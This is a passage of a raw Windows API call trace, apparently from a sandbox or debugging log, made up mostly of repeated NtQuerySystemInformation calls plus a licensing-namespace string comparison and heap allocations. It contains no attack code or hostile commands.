[0227.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0227.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd870, Length=0x28, ResultLength=0x0) [0227.996] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6c0, Length=0x28, ResultLength=0x0) [0228.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0228.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd870, Length=0x28, ResultLength=0x0) [0228.005] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0228.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6c0, Length=0x28, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0228.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.017] GetProcessHeap () returned 0x2026c630000 [0228.017] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65f1b0 [0228.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.112] GetProcessHeap () returned 0x2026c630000 [0228.112] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65f270 [0228.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc70, Length=0x28, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb90, Length=0x20, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc50, Length=0x20, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation 